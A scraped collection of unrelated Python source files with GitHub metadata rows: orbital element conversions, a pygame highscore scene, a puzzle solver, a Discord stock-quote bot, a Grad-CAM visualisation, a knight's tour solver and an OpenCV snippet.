Converts a datetime object to a Julian Date. The Julian Date is the number of days since noon on January 1, 4713 BC.
Args:
datetime_obj (`datetime.datetime`): datetime object to convert
Returns:
`float`: Julian Date
"""
return sum(jday(year=datetime_obj.year, mon=datetime_obj.month, day=datetime_obj.day, hr=datetime_obj.hour, minute=datetime_obj.minute, sec=datetime_obj.second+float('0.'+str(datetime_obj.microsecond))))
def from_cartesian_to_tle_elements(state, gravity_constant_name='wgs-72'):
"""
This function converts the provided state from Cartesian to TLE elements.
Args:
state (`np.ndarray`): state to convert
gravity_constant_name (`str`): name of the central body (default: 'wgs-72')
Returns:
tuple: tuple containing: - `float`: semi-major axis - `float`: eccentricity - `float`: inclination - `float`: right ascension of the ascending node - `float`: argument of perigee - `float`: mean anomaly
"""
_,mu_earth,_,_,_,_,_,_=get_gravity_constants(gravity_constant_name)
mu_earth=float(mu_earth)*1e9
kepl_el = from_cartesian_to_keplerian(state, mu_earth)
tle_elements={}
tle_elements['mean_motion'] = np.sqrt(mu_earth/((kepl_el[0])**(3.0)))
tle_elements['eccentricity'] = kepl_el[1]
tle_elements['inclination'] = kepl_el[2]
tle_elements['raan'] = kepl_el[3]
tle_elements['argument_of_perigee'] = kepl_el[4]
mean_anomaly = kepl_el[5] - kepl_el[1]*np.sin(kepl_el[5])
tle_elements['mean_anomaly'] = mean_anomaly%(2*np.pi)
return tle_elements
def from_cartesian_to_keplerian(state, mu):
"""
This function takes the state in cartesian coordinates and the gravitational
parameter of the central body, and returns the state in Keplerian elements.
Args:
state (`np.array`): numpy array of 2 rows and 3 columns, where
the first row represents position, and the second velocity.
mu (`float`): gravitational parameter of the central body
Returns:
`np.array`: numpy array of the six keplerian elements: (a,e,i,omega,Omega,mean_anomaly)
(i.e., semi major axis, eccentricity, inclination,
right ascension of ascending node, argument of perigee,
mean anomaly). All the angles are in radiants, eccentricity is unitless
and semi major axis is in SI.
"""
h_bar = np.cross(np.array([state[0,0], state[0,1], state[0,2]]), np.array([state[1,0], state[1,1], state[1,2]]))
h = np.linalg.norm(h_bar)
r = np.linalg.norm(np.array([state[0,0], state[0,1], state[0,2]]))
v = np.linalg.norm(np.array([state[1,0], state[1,1], state[1,2]]))
E = 0.5*(v**2)-mu/r
a = -mu/(2*E)
e = np.sqrt(1-(h**2)/(a*mu))
i = np.arccos(h_bar[2]/h)
Omega = np.arctan2(h_bar[0],-h_bar[1])
lat = np.arctan2(np.divide(state[0,2],(np.sin(i))), (state[0,0]*np.cos(Omega) + state[0,1]*np.sin(Omega)))
p = a*(1-e**2)
nu = np.arctan2(np.sqrt(p/mu)*np.dot(np.array([state[0,0], state[0,1], state[0,2]]),np.array([state[1,0], state[1,1], state[1,2]])), p-r)
omega = (lat-nu)
eccentric_anomaly = 2*np.arctan(np.sqrt((1-e)/(1+e))*np.tan(nu/2))
n = np.sqrt(mu/(a**3))
mean_anomaly=eccentric_anomaly-e*np.sin(eccentric_anomaly)
#I make sure they are always in 0,2pi
if mean_anomaly<0:
mean_anomaly = 2*np.pi-abs(mean_anomaly)
if omega<0:
omega=2*np.pi-abs(omega)
if Omega<0:
Omega=2*np.pi-abs(Omega)
if abs(mean_anomaly)>2*np.pi:
mean_anomaly=mean_anomaly%(2*np.pi)
if abs(omega)>2*np.pi:
omega=omega%(2*np.pi)
if abs(Omega)>2*np.pi:
Omega=Omega%(2*np.pi)
return np.array([a, e, i, Omega, omega, mean_anomaly])
def from_cartesian_to_keplerian_torch(state, mu):
"""
Same as from_cartesian_to_keplerian, but for torch tensors.
Args:
state (`np.array`): numpy array of 2 rows and 3 columns, where
the first row represents position, and the second velocity.
mu (`float`): gravitational parameter of the central body
Returns:
`np.array`: numpy array of the six keplerian elements: (a,e,i,omega,Omega,mean_anomaly)
(i.e., semi major axis, eccentricity, inclination,
right ascension of ascending node, argument of perigee,
mean anomaly). All the angles are in radiants, eccentricity is unitless
and semi major axis is in SI.
"""
h_bar = torch.cross(state[0], state[1])
h = h_bar.norm()
r = state[0].norm()
v = torch.norm(state[1])
E = 0.5*(v**2)-mu/r
a = -mu/(2*E)
e = torch.sqrt(1-(h**2)/(a*mu))
i = torch.arccos(h_bar[2]/h)
Omega = torch.arctan2(h_bar[0],-h_bar[1])
lat = torch.arctan2(torch.divide(state[0,2],(torch.sin(i))), (state[0,0]*torch.cos(Omega) + state[0,1]*torch.sin(Omega)))
p = a*(1-e**2)
nu = torch.arctan2(torch.sqrt(p/mu)*torch.dot(state[0],state[1]), p-r)
omega = (lat-nu)
eccentric_anomaly = 2*torch.arctan(torch.sqrt((1-e)/(1+e))*torch.tan(nu/2))
n = torch.sqrt(mu/(a**3))
mean_anomaly=eccentric_anomaly-e*torch.sin(eccentric_anomaly)
    # convert the mean motion from rad/s to rad/min (the no_kozai form returned below)
mean_motion=torch.sqrt(mu/((a)**(3.0)))
xpdotp = 1440.0 / (2.0 *np.pi)
no_kozai_conversion_factor=xpdotp/43200.0* np.pi
no_kozai=mean_motion/no_kozai_conversion_factor
return [no_kozai, e, i, Omega, omega, mean_anomaly]
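# A minimal usage sketch (the orbit below is illustrative, not a dSGP4 test
# case): a slightly elliptical orbit with a 7000 km perigee radius and 45 deg
# inclination, converted from a Cartesian state (SI units) to Keplerian elements.
if __name__ == "__main__":
    mu_earth = 398600.5e9                     # wgs-84 mu from above, in m^3/s^2
    r = 7000.0e3                              # perigee radius [m]
    v = 1.1 * np.sqrt(mu_earth / r)           # tangential speed at perigee [m/s]
    inc = np.deg2rad(45.0)
    state = np.array([[r, 0.0, 0.0],
                      [0.0, v * np.cos(inc), v * np.sin(inc)]])
    a, e, i, Omega, omega, M = from_cartesian_to_keplerian(state, mu_earth)
    print(f"a = {a / 1e3:.1f} km, e = {e:.3f}, i = {np.rad2deg(i):.1f} deg")
    # roughly a ~ 8861 km, e ~ 0.21, i ~ 45 deg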
|
esa/dSGP4
|
dsgp4/util.py
|
util.py
|
py
| 14,817 |
python
|
en
|
code
| 1 |
github-code
|
6
|
45364274546
|
import pygame
from Game.Scenes.Scene import *
from Game.Shared import GameConstant
from Game import Highscore
class HighscoreScene(Scene):
def __init__(self, game):
super(HighscoreScene, self).__init__(game)
self.__highScoreSprite = pygame.transform.scale(pygame.image.load(GameConstant.SPRITE_HIGHSCORE) , (276,164))
def render(self):
self.getGame().screen.blit(self.__highScoreSprite , (50 , 50))
self.clearText()
highscore = Highscore()
x = 350
y = 100
for score in highscore.getScores():
self.addText(score[0] , x , y , size = 30)
self.addText(str(score[1]) , x + 200 , y , size = 30)
y+=30
self.addText("Press F1 to start The Game" , 50 , 300 , size = 30)
super(HighscoreScene, self).render()
def handleEvents(self , events):
super(HighscoreScene,self).handleEvents(events)
for event in events:
keys = pygame.key.get_pressed()
if event.type == pygame.QUIT:
quit()
if keys[pygame.K_F1]:
self.getGame().reset()
self.getGame().changeScene(GameConstant.PLAYING_SCENE)
|
grapeJUICE1/Grape-Bricks
|
Game/Scenes/HighScoreScene.py
|
HighScoreScene.py
|
py
| 1,256 |
python
|
en
|
code
| 7 |
github-code
|
6
|
5467682111
|
import time
time_start = time.time()
f = open('//Users/sanderlindberg/Documents/kodekalendere/knowit/2/world.txt').read().split("\n")
def find_seq(elem):
seqs = []
overflow_ind = 0
if elem[0] == " ":
for i in range(len(elem)):
if elem[i] == "#" or i == len(elem) -1:
overflow_ind = i
seqs.append([0, i-1, True])
break
if overflow_ind != len(elem) -1:
for i in range(len(elem)-1):
start = i
end = i+1
overflow = False
if elem[start] == "#" and elem[end] == " ":
for j in range(i+1, len(elem)):
if elem[j] == " ":
end = j
elif elem[j] == "#":
break
if end == len(elem) - 1:
overflow = True
seqs.append([start+1, end, overflow])
return seqs
def calc(arr):
s = 0
    for i in range(len(arr)):
        for j in range(len(arr[i])):
            if arr[i][j][2] == False:
                if arr[i][j][0] == 0 or arr[i][j][0] == 1:
                    s += arr[i][j][1]
                else:
                    s += arr[i][j][1] - arr[i][j][0] + 1
return s
t = []
count = 0
for elem in f:
if count == 0:
t.append(find_seq(elem))
count += 1
else:
if t[-1] == []:
break
t.append(find_seq(elem))
print(time.time() - time_start)
print(calc(t))
|
skanin/Julekalendere_2019
|
knowit/2/2.py
|
2.py
|
py
| 1,484 |
python
|
en
|
code
| 0 |
github-code
|
6
|
13043566776
|
from _datetime import datetime
preparation_time = 30
donation_time = 30
class EventData(object):
# @Nori
# Definition explanation comes here...
@staticmethod
def get_event_date():
global ev_date
isvaild = False
while not isvaild:
data = input("Enter your Event date (YYYY.MM.DD):")
try:
                ev_date = datetime.strptime(data, "%Y.%m.%d")  # only accept the input if it matches this format
if ev_date.isoweekday() != 6 and ev_date.isoweekday() != 7:
if (ev_date.date() - datetime.now().date()).days > 10:
isvaild = True
else:
                        print("Your donation date has to be more than 10 days from now")
else:
                    print("Event date must not be on weekends")
except ValueError:
                print(data, "is not a valid date! Try again (YYYY.MM.DD), ex: 2010.10.10")
return ev_date
# @Nori
# Definition explanation comes here...
@staticmethod
def get_donation_start():
global don_start
isvaild = False
while not isvaild:
data = input("Enter your Start of donation (HH:MM):")
try:
                don_start = datetime.strptime(data, "%H:%M")  # only accept the input if it matches this format
isvaild = True
except ValueError:
print(data, "is not a valid time! HH:MM. ex: 13:10")
return don_start
# @Bandi
    # Definition explanation comes here... Returns the end of the donation event, in HH:MM format, e.g. 12:10
@staticmethod
def get_donation_end():
global don_end
isvaild = False
while not isvaild:
data = input("Enter your End of donation (HH:MM):")
try:
                don_end = datetime.strptime(data, "%H:%M")  # only accept the input if it matches this format
if don_start < don_end:
isvaild = True
else:
                    print("Donation End has to be later than Donation Start! (Donation start:", don_start.strftime("%H:%M"), "):")
except ValueError:
print(data, "is not a valid time! HH:MM. ex: 13:10")
return don_end
# @Bandi
    # Definition explanation comes here... Asks for the ZIP code: exactly 4 digits, and the first digit must not be zero.
@staticmethod
def get_zip_code():
isvaild = False
while not isvaild:
ZIP = input("Enter your ZIP CODE (XXXX):")
try:
if int(ZIP) and len(ZIP) == 4:
if ZIP[0] != "0":
isvaild = True
else:
                        print(ZIP, "is not valid! The first digit must not be 0!")
else:
print("ZIP must be 4 digits!")
except ValueError:
print("Only Numbers!")
return ZIP
# @Atilla
# Asks for the donor's city.
@staticmethod
def get_city():
cities = ["Miskolc", "Kazincbarcika", "Szerencs", "Sarospatak"]
# Asks for the input here first.
city = input("Please enter the donor's city: ")
# Keeps asking for the city while it does not match one from the cities list.
while city not in cities:
            city = input("Donors are accepted only from the following cities:\
            Miskolc, Kazincbarcika, Szerencs and Sarospatak: ")
# Returns with the city.
return city
# @Atilla
# Asks for the donor's address.
@staticmethod
def get_address():
# Asks for the input here first.
street = input("Please enter the donor's address: ")
# Keeps asking for the address while it does not less or equal than 25 characters.
while len(street) <= 25:
street = input("The address should be less than 25 characters!: ")
# Returns with the address.
return street
# @Mate
# Definition explanation comes here...
@staticmethod
def get_available_beds():
return True
# @Mate
# Definition explanation comes here...
@staticmethod
def get_planned_donor_number():
return True
# @Adam
# Definition explanation comes here...
@staticmethod
def success_rate():
return True
|
Bandita69/TFF
|
Event.py
|
Event.py
|
py
| 4,417 |
python
|
en
|
code
| 1 |
github-code
|
6
|
29099358897
|
from extra_functions import rgb_to_hex, hex_to_rgb
class Heatmap:
def __init__(self):
self.fact_cache = {}
@staticmethod
def _color_dict(gradient):
""" Takes in a list of RGB sub-lists and returns dictionary of
colors in RGB and hex form for use in a graphing function
defined later on """
return {"hex": [rgb_to_hex(rgb) for rgb in gradient],
"r": [rgb[0] for rgb in gradient],
"g": [rgb[1] for rgb in gradient],
"b": [rgb[2] for rgb in gradient]}
def _linear_gradient(self, start_hex, end_hex="#FFFFFF", colour_amount=1000):
''' returns a gradient list of (n) colors between
        two hex colors. start_hex and end_hex
        should be the full six-digit color string,
        including the number sign ("#FFFFFF") '''
# Starting and ending colors in RGB form
start_colour = hex_to_rgb(start_hex)
end_colour = hex_to_rgb(end_hex)
# Initialize a list of the output colors with the starting color
rgb_list = [start_colour]
# Calculate a color at each evenly spaced value of t from 1 to n
for counter in range(1, colour_amount):
# Interpolate RGB vector for color at the current value of t
curr_vector = [int(start_colour[column] + (float(counter) / (colour_amount-1)) *
(end_colour[column] - start_colour[column])) for column in range(3)]
# Add it to our list of output colors
rgb_list.append(curr_vector)
return self._color_dict(rgb_list)
def poly_linear_gradient(self, colors, n):
''' returns a list of colors forming linear gradients between
all sequential pairs of colors. "n" specifies the total
number of desired output colors '''
# The number of colors per individual linear gradient
n_out = int(float(n) / (len(colors) - 1))
# returns dictionary defined by color_dict()
gradient_dict = self._linear_gradient(colors[0], colors[1], n_out)
if len(colors) > 1:
for col in range(1, len(colors) - 1):
next = self._linear_gradient(colors[col], colors[col+1], n_out)
for k in ("hex", "r", "g", "b"):
# Exclude first point to avoid duplicates
gradient_dict[k] += next[k][1:]
return gradient_dict
@staticmethod
def get_complementary(color):
# strip the # from the beginning
color = color[1:]
# convert the string into hex
color = int(color, 16)
# invert the three bytes
        # equivalent to subtracting each RGB component from 255 (0xFF)
comp_color = 0xFFFFFF ^ color
# convert the color back to hex by prefixing a #
comp_color = "#%06X" % comp_color
# return the result
return comp_color
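    # Worked example (illustrative): get_complementary("#FF0000") returns
    # "#00FFFF", since 0xFF0000 ^ 0xFFFFFF == 0x00FFFF.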
@staticmethod
def _convert_percentiles(well_dict, percentiles):
well_values = [value for wells, value in well_dict.items() if value != "nan"]
max_values = max(well_values)
min_values = min(well_values)
percentile_dict = {"high": {"max": max_values, "min": "", "mid": ""},
"low": {"max": "", "min": min_values, "mid": ""}}
if percentiles["low"] != 0:
percentile_dict["low"]["max"] = (max_values / 100) * percentiles["low"]
else:
percentile_dict["low"]["max"] = min_values
if percentiles["high"] != 100:
percentile_dict["high"]["min"] = (max_values / 100) * percentiles["high"]
else:
percentile_dict["high"]["min"] = max_values
if percentiles["mid"]:
percentile_dict["high"]["mid"] = (((max_values - min_values) / 100) * percentiles["mid"]) + min_values
percentile_dict["low"]["mid"] = (((max_values - min_values)/ 100) * percentiles["mid"]) + min_values
print(percentile_dict)
return percentile_dict, max_values, min_values
@staticmethod
def _samples_per_percentile(well_dict, percentile_dict, colour_amount):
wells_percentile_dict = {}
for well in well_dict:
wells_percentile_dict[well] = {}
if well_dict[well] >= percentile_dict["high"]["mid"]:
wells_percentile_dict[well]["percentile"] = "high"
if percentile_dict["high"]["max"] >= well_dict[well] >= percentile_dict["high"]["min"]:
wells_percentile_dict[well]["colour_value"] = colour_amount
else:
percent_of_range = 100 / (percentile_dict["high"]["min"] - percentile_dict["high"]["mid"]) * \
(well_dict[well] - percentile_dict["high"]["mid"])
colour_value = colour_amount/100 * percent_of_range
wells_percentile_dict[well]["colour_value"] = colour_value
elif percentile_dict["high"]["mid"] > well_dict[well] >= percentile_dict["low"]["min"]:
wells_percentile_dict[well]["percentile"] = "low"
if percentile_dict["low"]["max"] >= well_dict[well] >= percentile_dict["low"]["min"]:
wells_percentile_dict[well]["colour_value"] = 0
else:
percent_of_range = 100 / (percentile_dict["low"]["mid"] - percentile_dict["low"]["max"]) * \
(well_dict[well] - percentile_dict["low"]["max"])
colour_value = colour_amount/100 * percent_of_range
wells_percentile_dict[well]["colour_value"] = colour_value
#
# if well_dict[well] >= percentile_dict[percentile]:
# try:
# if wells_percentile_dict[well]["lower_bound"] < percentile_dict[percentile]:
# wells_percentile_dict[well]["lower_bound"] = percentile
# except KeyError:
# wells_percentile_dict[well]["lower_bound"] = percentile
#
# if well_dict[well] <= percentile_dict[percentile]:
# try:
# if wells_percentile_dict[well]["upper_bound"] > percentile_dict[percentile]:
# wells_percentile_dict[well]["upper_bound"] = percentile_dict[percentile]
# except KeyError:
# wells_percentile_dict[well]["upper_bound"] = percentile_dict[percentile]
return wells_percentile_dict
@staticmethod
def dict_convert(well_dict, state_dict, states):
heatmap_dict = {}
for well in well_dict:
if state_dict[well]["state"] in states:
heatmap_dict[well] = well_dict[well]
return heatmap_dict
@staticmethod
def get_well_colour(colour_dict, wells_percentile_dict, well):
# temp_well_value = round(well_dict[well] / well_percentile_dict[well]["upper_bound"] * 1000)
# well_percentile = well_percentile_dict[well]["lower_bound"]
try:
colour_bound = wells_percentile_dict[well]["percentile"]
except KeyError:
return "white"
well_colour_value = round(wells_percentile_dict[well]["colour_value"])
try:
well_colour = colour_dict[colour_bound]["hex"][well_colour_value]
except IndexError:
well_colour = colour_dict[colour_bound]["hex"][-1]
return well_colour
def heatmap_colours(self, well_dict, percentile, colours):
percentile_dict, max_values, min_values = self._convert_percentiles(well_dict, percentile)
colour_amount = 1000
colour_dict = {}
for percentile in percentile_dict:
colour_dict[percentile] = self.poly_linear_gradient(colours[percentile], colour_amount)
well_percentile_dict = self._samples_per_percentile(well_dict, percentile_dict, colour_amount)
return colour_dict, well_percentile_dict, max_values, min_values
if __name__ == "__main__":
start_hex = "#5cb347"
end_hex = "#5cb347"
mid_2 = "#5cb347"
mid_3 = "#5cb347"
mid_hex = [2, 1]
colour_list = [start_hex, mid_2, mid_2, mid_3, mid_3, end_hex]
hm = Heatmap()
    # Heatmap defines no bezier_gradient method; poly_linear_gradient appears to
    # be the intended call here.
    print(hm.poly_linear_gradient(colour_list, 5))
|
ZexiDilling/structure_search
|
heatmap.py
|
heatmap.py
|
py
| 8,347 |
python
|
en
|
code
| 0 |
github-code
|
6
|
17221793090
|
import json
import aiohttp
import discord
import datetime
from discord import Embed
import plotly.express as px
import pandas as pd
import random
with open("config.json", "r") as config:
data = json.load(config)
token = data["Token"]
prefix = data["Prefix"]
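# The two lookups above assume a config.json shaped roughly like:
#   {"Token": "<discord bot token>", "Prefix": "$"}
# (the "$" prefix matches the ticker.content.replace("$", "") calls further down)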
intents = discord.Intents.default()
intents.members = True
client = discord.Client(intents=intents)
@client.event
async def on_ready():
print("ready")
@client.event
async def on_message(ticker):
if prefix in ticker.content:
try:
urlchart = "https://query1.finance.yahoo.com/v8/finance/chart/{}?symbol={}&period1=1653192000&period2={}&useYfid=true&interval=1d&includePrePost=true&events=div|split|earn&lang=en-CA®ion=CA&crumb=y.I3QERsNxs&corsDomain=ca.finance.yahoo.com".format(ticker.content.replace("$","").upper(),ticker.content.replace("$","").upper(),str(int((datetime.datetime.now() - datetime.datetime.utcfromtimestamp(0)).total_seconds())))
urlticker = "https://query2.finance.yahoo.com/v7/finance/quote?formatted=true&crumb=wkU/diDLxbC&lang=en-US®ion=US&symbols={}&fields=messageBoardId,longName,shortName,marketCap,underlyingSymbol,underlyingExchangeSymbol,headSymbolAsString,regularMarketPrice,regularMarketChange,regularMarketChangePercent,regularMarketVolume,uuid,regularMarketOpen,fiftyTwoWeekLow,fiftyTwoWeekHigh,toCurrency,fromCurrency,toExchange,fromExchange,corporateActions&corsDomain=finance.yahoo.com".format(ticker.content.replace("$","").upper())
headers = {"accept": "*/*","accept-language": "en-US,en;q=0.7","sec-fetch-dest": "empty","sec-fetch-mode": "cors","sec-fetch-site": "same-site","sec-gpc": "1","referrer": "https://ca.finance.yahoo.com/","referrerPolicy": "no-referrer-when-downgrade","body": "null","method": "GET","mode": "cors","credentials": "include"}
getCdata = await chartData(urlchart,headers)
getTdata = await tickerData(urlticker,headers)
plotted = await plot(getCdata,getTdata['tick'])
embeds = await embed(getTdata, plotted)
await sendOut(embeds,ticker,plotted)
except Exception as e:
print("failed {}".format(e))
async def chartData(url,headers):
async with aiohttp.ClientSession() as chartdata:
async with chartdata.get(url,headers=headers) as get:
d = {}
chartdata_json = json.loads(await get.text())
chartdata_json = chartdata_json['chart']['result'][0]
timestamps = chartdata_json["timestamp"]
dates = []
for each in timestamps:
dates.append(datetime.datetime.fromtimestamp(each).strftime('%Y-%m-%d %H:%M:%S'))
openData = chartdata_json["indicators"]["quote"][0]['open']
closeData = chartdata_json["indicators"]["quote"][0]['close']
highData = chartdata_json["indicators"]["quote"][0]['high']
lowData = chartdata_json["indicators"]["quote"][0]['low']
volumeData = chartdata_json["indicators"]["quote"][0]['volume']
d["Dates"] = dates
d["Open"] = openData
d["Close"] = closeData
d["High"] = highData
d["Low"] = lowData
d["Volume"] = volumeData
return d
async def tickerData(url,headers):
async with aiohttp.ClientSession() as tickerdata:
async with tickerdata.get(url,headers=headers) as get:
ticker_json = json.loads(await get.text())
ticker_json = ticker_json['quoteResponse']['result'][0]
d = {}
d['tick'] = ticker_json['symbol']
d['currentPrice'] = ticker_json["regularMarketPrice"]['fmt']
d['marketCap'] = ticker_json['marketCap']['fmt']
d['marketTime'] = ticker_json['regularMarketTime']['fmt']
d['percentChangedDay'] = ticker_json['regularMarketChangePercent']['fmt']
d['marketRange'] = ticker_json['regularMarketDayRange']['fmt']
d['yearlyLowChange'] = ticker_json['fiftyTwoWeekLowChange']['fmt']
d['percentYearlyLow'] = ticker_json['fiftyTwoWeekHighChangePercent']['fmt']
d['regMarketHigh'] = ticker_json['regularMarketDayHigh']['fmt']
d['sharesOut'] = ticker_json['sharesOutstanding']['fmt']
d['regPrevClose'] = ticker_json['regularMarketPreviousClose']['fmt']
d['yearlyHigh'] = ticker_json['fiftyTwoWeekHigh']['fmt']
d['yearlyhighChange'] = ticker_json['fiftyTwoWeekHighChange']['fmt']
d['yearlyRange'] = ticker_json['fiftyTwoWeekRange']['fmt']
d['regMarketChange'] = ticker_json['regularMarketChange']['fmt']
d['yearlyLow'] = ticker_json['fiftyTwoWeekLow']['fmt']
d['marketVol'] = ticker_json['regularMarketVolume']['fmt']
d['regMarketLow'] = ticker_json['regularMarketDayLow']['fmt']
d['shortName'] = ticker_json['shortName']
return d
async def plot(datas,tick):
df = pd.DataFrame(datas)
fig = px.line(df, title="{} Chart".format(tick), x = "Dates", y =["Open","Close","High","Low"])
fig.update_layout(paper_bgcolor="black",plot_bgcolor="black")
openImgDir = "{}.jpg".format(tick+str(random.randint(0,1000000)))
fig.write_image(openImgDir)
df1 = pd.DataFrame(datas)
fig1 = px.line(df1, title="{} Volume Chart".format(tick), x = "Dates", y ="Volume")
fig1.update_layout(paper_bgcolor="black",plot_bgcolor="black")
volImgDir = "{}.jpg".format(tick+str(random.randint(0,1000000)))
fig1.write_image(volImgDir)
return openImgDir, volImgDir
async def embed(Tdata,plotted):
embeds = []
embed = discord.Embed()
embed1 = discord.Embed()
embed2 = discord.Embed()
embed.title = "${} Stock Info".format(Tdata['tick'])
embed.description = "Market statistics and data for {}".format(Tdata['shortName'])
embed.add_field(name="Ticker", value=Tdata['tick'], inline=True)
embed.add_field(name="Current Market Time", value=Tdata['marketTime'], inline=True)
embed.add_field(name="Current Price", value=Tdata['currentPrice'], inline=True)
embed.add_field(name="Market Cap", value=Tdata['marketCap'], inline=True)
embed.add_field(name="24Hr High", value=Tdata['regMarketHigh'], inline=True)
embed.add_field(name="24hr Low", value=Tdata['regMarketLow'], inline=True)
embed.add_field(name="24Hr Difference", value=Tdata['regMarketChange'], inline=True)
embed.add_field(name="24Hr %", value=Tdata['percentChangedDay'], inline=True)
embed.add_field(name="24Hr Range", value=Tdata['marketRange'], inline=True)
embed.add_field(name="Market Volume", value=Tdata['marketVol'], inline=True)
embed.add_field(name="Outstanding Shares", value=Tdata['sharesOut'], inline=True)
embed.add_field(name="Previous Close", value=Tdata['regPrevClose'], inline=True)
embed.add_field(name="52w Price Difference", value=Tdata['yearlyLowChange'], inline=True)
embed.add_field(name="52w %", value=Tdata['percentYearlyLow'], inline=True)
embed.add_field(name="52w High", value=Tdata['yearlyHigh'], inline=True)
embed.add_field(name="52w High Difference", value=Tdata['yearlyhighChange'], inline=True)
embed.add_field(name="52w Range", value=Tdata['yearlyRange'], inline=True)
embed.add_field(name="52w Low", value=Tdata['yearlyLow'], inline=True)
embed1.set_image(url="attachment://{}".format(plotted[0]))
embed2.set_image(url="attachment://{}".format(plotted[1]))
embeds.append(embed)
embeds.append(embed1)
embeds.append(embed2)
return embeds
async def sendOut(embeds,ticker,plotted):
await ticker.channel.send(embed=embeds[0])
with open(plotted[0], 'rb') as image1:
await ticker.channel.send(file=discord.File(image1, filename=plotted[0]))
with open(plotted[1], 'rb') as image2:
await ticker.channel.send(file=discord.File(image2, filename=plotted[1]))
client.run(token)
|
Eryck13/StockBot
|
main.py
|
main.py
|
py
| 8,237 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70488529787
|
# accepted on codewars.com
import sys
deltas = [[-2, -1, 1, 2, 2, 1, -1, -2], [1, 2, 2, 1, -1, -2, -2, -1]]
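# fixed preference order over the eight knight moves, used when breaking ties between equally good candidates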
order = [4, 0, 5, 1, 6, 2, 7, 3]
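# offsets of the four orthogonally adjacent cells, used to count free neighbours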
adjOnes = [[-1, 0, 1, 0], [0, 1, 0, -1]]
flag: bool
coordinates_of_knight: list[list[int]]
def knights_tour(start: tuple[int, int], size: int):
global flag, coordinates_of_knight
board = [[0] * size for _ in range(size)]
flag = True
board[start[0]][start[1]] = 1
coordinates_of_knight = [start]
# checks coordinates if they are located inside the board
def is_valid(board_size: int, j: int, i: int) -> bool:
return 0 <= i < board_size and 0 <= j < board_size
    def next_possible_cells(curr_j: int, curr_i: int) -> int:  # this helper and the next one could be merged,
        # but they are kept separate for readability
nextPossibleCells = 0
for i in range(0, len(deltas[0])):
if is_valid(size, curr_j + deltas[0][i], curr_i + deltas[1][i]) and board[curr_j + deltas[0][i]][curr_i + deltas[1][i]] == 0:
nextPossibleCells += 1
return nextPossibleCells
def adjacent_possible_cells(curr_j: int, curr_i: int):
adjacentPossibleCells = 0
for i in range(0, len(adjOnes[0])):
if is_valid(size, curr_j + adjOnes[0][i], curr_i + adjOnes[1][i]) and board[curr_j + adjOnes[0][i]][curr_i + adjOnes[1][i]] == 0:
adjacentPossibleCells += 1
return adjacentPossibleCells
    # linear recursion with Warnsdorff's heuristic: adjacency and angle minimization at every step, plus backtracking
def recursive_seeker(j: int, i: int, counter: int) -> None: # works better, but cannot handle really big sizes...
global flag, coordinates_of_knight
# needs to be run with special parameters
if counter == size * size + 1:
flag = False
return
allPossibleCells = dict()
for index in range(0, len(deltas[0])):
if is_valid(size, j + deltas[0][index], i + deltas[1][index]) and board[j + deltas[0][index]][i + deltas[1][index]] == 0:
allPossibleCells[index] = next_possible_cells(j + deltas[0][index], i + deltas[1][index])
if len(allPossibleCells) > 0:
minValueNext = len(deltas[0])
minValueAdj = len(adjOnes[0])
minAngleKey: int
for key in allPossibleCells.keys():
if allPossibleCells.get(key) < minValueNext:
minValueNext = allPossibleCells.get(key)
minNextPossCells = dict()
for key in allPossibleCells.keys():
if allPossibleCells.get(key) == minValueNext:
minNextPossCells[key] = adjacent_possible_cells(j + deltas[0][key], i + deltas[1][key])
for key in minNextPossCells.keys():
if minNextPossCells.get(key) < minValueAdj:
minValueAdj = minNextPossCells.get(key)
minNextPossAdjCells = dict()
for key in minNextPossCells.keys():
if minNextPossCells.get(key) == minValueAdj:
minNextPossAdjCells[key] = minNextPossCells[key]
for k in range(0, len(order)):
if flag and order[k] in minNextPossAdjCells.keys():
minAngleKey = order[k]
board[j + deltas[0][minAngleKey]][i + deltas[1][minAngleKey]] = counter
coordinates_of_knight.append((j + deltas[0][minAngleKey], i + deltas[1][minAngleKey]))
recursive_seeker(j + deltas[0][minAngleKey], i + deltas[1][minAngleKey], counter + 1)
if flag:
board[j + deltas[0][minAngleKey]][i + deltas[1][minAngleKey]] = 0
coordinates_of_knight = coordinates_of_knight[:-1]
recursive_seeker(start[0], start[1], 1 + 1)
for arr in board:
print(arr)
print()
print(f'length: {len(coordinates_of_knight)}')
return coordinates_of_knight
# print(knights_tour([0, 0], 10))
sys.setrecursionlimit(1000000)
print(knights_tour((0, 0), 43))
# print([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11][:-1])
|
LocusLontrime/Python
|
CodeWars_Rush/_4kyu/A_Knights_Tour_4kyu.py
|
A_Knights_Tour_4kyu.py
|
py
| 4,194 |
python
|
en
|
code
| 1 |
github-code
|
6
|
12229413948
|
import torch
import torchvision
import PIL
import torch.nn.functional as F
import numpy
from matplotlib import cm
# Grad-CAM: hooks below capture the target layer's activations (A) and the gradients of the score w.r.t. them (dy/dA)
def hook_store_A(module, input, output):
module.A = output[0]
def hook_store_dydA(module, grad_input, grad_output):
module.dydA = grad_output[0]
if __name__ == "__main__":
model = torchvision.models.vgg19(pretrained=True)
to_tensor = torchvision.transforms.ToTensor()
img = PIL.Image.open('elephant_hippo.jpeg')
input = to_tensor(img).unsqueeze(0)
layer = model.features[35]
layer.register_forward_hook(hook_store_A)
layer.register_backward_hook(hook_store_dydA)
output = model(input)
c = 386 # African elephant
output[0, c].backward()
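    # Grad-CAM: weight each activation channel by its gradient averaged over the spatial dims,
    # then keep only the positive part of the weighted sum as the localization map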
alpha = layer.dydA.mean((2, 3), keepdim=True)
L = torch.relu((alpha * layer.A).sum(1, keepdim=True))
L = L / L.max()
L = F.interpolate(L, size=(input.size(2), input.size(3)),
mode='bilinear', align_corners=False)
l = L.view(L.size(2), L.size(3)).detach().numpy()
PIL.Image.fromarray(numpy.uint8(cm.gist_earth(l) * 255)).save('result.png')
res = PIL.Image.open('result.png')
img=img.convert('RGBA')
merge_res = PIL.Image.blend(img, res, 0.8)
merge_res.save('result-merge.png')
|
pengxj/DeepLearningCourse
|
code/VisInput.py
|
VisInput.py
|
py
| 1,281 |
python
|
en
|
code
| 9 |
github-code
|
6
|
35227507194
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 18 01:16:56 2017
@author: Leon
"""
from osgeo import gdal
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from scipy import spatial
import cv2
im = cv2.imread('fill.jpg')
ntu = cv2.imread('DSCF2098_1471837627895.jpg')
imgray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
ret,thresh = cv2.threshold(imgray,127,255,0)
